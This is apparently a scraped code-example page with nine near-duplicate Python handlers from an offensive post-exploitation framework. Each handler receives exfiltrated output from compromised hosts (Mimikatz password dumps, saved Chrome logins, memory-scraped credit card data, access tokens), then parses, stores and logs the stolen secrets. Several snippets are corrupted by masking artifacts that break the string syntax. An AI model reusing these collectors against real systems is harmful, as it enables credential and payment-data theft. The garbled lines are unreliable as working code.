def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            creds = self.parse_mimikatz(data)
            if len(creds):
                context.log.success(
                    "Found credentials in Mimikatz output (domain\\username:password)"
                )
                for cred_set in creds:
                    credtype, domain, username, password, _, _ = cred_set
                    context.db.add_credential(credtype, domain, username,
                                              password)
                    context.log.highlight('{}\\{}:{}'.format(
                        domain, username, password))

            log_name = 'Mimikatz-{}-{}.log'.format(
                response.client_address[0],
                datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved Mimikatz's output to {}".format(log_name))
Beispiel #2
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            creds = self.parse_mimikatz(data)
            if len(creds):
                context.log.success("Found credentials in Mimikatz output (domain\\username:password)")
                for cred_set in creds:
                    credtype, domain, username, password,_,_ = cred_set
                    
                    #Get the hostid from the DB
                    hostid = context.db.get_hosts(response.client_address[0])[0][0]

                    context.db.add_credential(credtype, domain, username, password, hostid)
                    context.log.highlight('{}\\{}:{}'.format(domain, username, password))

            log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved Mimikatz's output to {}".format(log_name))
Beispiel #3
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            buf = StringIO(data).readlines()
            creds = []

            i = 0
            while i < len(buf):
                if ('URL' in buf[i]):
                    url  = buf[i].split(':', 1)[1].strip()
                    user = buf[i+1].split(':', 1)[1].strip()
                    passw = buf[i+3].split(':', 1)[1].strip()

                    creds.append({'url': url, 'user': user, 'passw': passw})

                i += 1

            if creds:
                context.log.success('Found saved Chrome credentials:')
                for cred in creds:
                    context.log.highlight('URL: ' + cred['url'])
                    context.log.highlight('Username: '******'user'])
                    context.log.highlight('Password: '******'passw'])
                    context.log.highlight('')

            log_name = 'EnumChrome-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved Mimikatz's output to {}".format(log_name))
Beispiel #4
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        if len(data):

            def print_post_data(data):
                buf = StringIO(data.strip()).readlines()
                for line in buf:
                    context.log.highlight(line.strip())

            try:
                data = b64decode(data)
            except:
                print_post_data(data)
                return

            context.log.success('Found possible credit card data')
            print_post_data(data)

            log_name = 'MemScraper-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved output to {}".format(log_name))
Beispiel #5
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            buf = StringIO(data).readlines()
            creds = []

            try:
                i = 0
                while i < len(buf):
                    if ('URL' in buf[i]):
                        url = buf[i].split(':', 1)[1].strip()
                        user = buf[i + 1].split(':', 1)[1].strip()
                        passw = buf[i + 3].split(':', 1)[1].strip()

                        creds.append({
                            'url': url,
                            'user': user,
                            'passw': passw
                        })

                    i += 1

                if creds:
                    context.log.success('Found saved Chrome credentials:')
                    for cred in creds:
                        context.log.highlight('URL: ' + cred['url'])
                        context.log.highlight('Username: '******'user'])
                        context.log.highlight('Password: '******'passw'])
                        context.log.highlight('')
            except:
                context.log.error(
                    'Error parsing Mimikatz output, please check log file manually for possible credentials'
                )

            log_name = 'EnumChrome-{}-{}.log'.format(
                response.client_address[0],
                datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved Mimikatz's output to {}".format(log_name))
Beispiel #6
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data) > 0:

            def print_post_data(data):
                buf = StringIO(data.strip()).readlines()
                for line in buf:
                    context.log.highlight(line.strip())

            context.log.success('Enumerated available tokens')

            if self.user:
                if data.find(self.user) != -1:
                    context.log.success("Found token for user {}!".format(
                        self.user))
                    print_post_data(data)

            elif self.userfile:
                with open(self.userfile, 'r') as userfile:
                    for user in userfile:
                        user = user.strip()
                        if data.find(user) != -1:
                            context.log.success(
                                "Found token for user {}!".format(user))
                            print_post_data(data)
                            break

            else:
                print_post_data(data)

            log_name = 'Tokens-{}-{}.log'.format(
                response.client_address[0],
                datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved output to {}".format(log_name))
Beispiel #7
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            def print_post_data(data):
                buf = StringIO(data.strip()).readlines()
                for line in buf:
                    context.log.highlight(line.strip())

            print_post_data(data)

            log_name = 'PowerView-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved output to {}".format(log_name))
Beispiel #8
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data):
            def print_post_data(data):
                buf = StringIO(data.strip()).readlines()
                for line in buf:
                    context.log.highlight(line.strip())

            print_post_data(data)

            log_name = 'MimiKittenz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved output to {}".format(log_name))
Beispiel #9
0
    def on_response(self, context, response):
        response.send_response(200)
        response.end_headers()
        length = int(response.headers.getheader('content-length'))
        data = response.rfile.read(length)

        #We've received the response, stop tracking this host
        response.stop_tracking_host()

        if len(data) > 0:

            def print_post_data(data):
                buf = StringIO(data.strip()).readlines()
                for line in buf:
                    context.log.highlight(line.strip())

            context.log.success('Enumerated available tokens')

            if self.user:
                if data.find(self.user) != -1:
                    context.log.success("Found token for user {}!".format(self.user))
                    print_post_data(data)

            elif self.userfile:
                with open(self.userfile, 'r') as userfile:
                    for user in userfile:
                        user = user.strip()
                        if data.find(user) != -1:
                            context.log.success("Found token for user {}!".format(user))
                            print_post_data(data)
                            break

            else:
                print_post_data(data)

            log_name = 'Tokens-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
            write_log(data, log_name)
            context.log.info("Saved output to {}".format(log_name))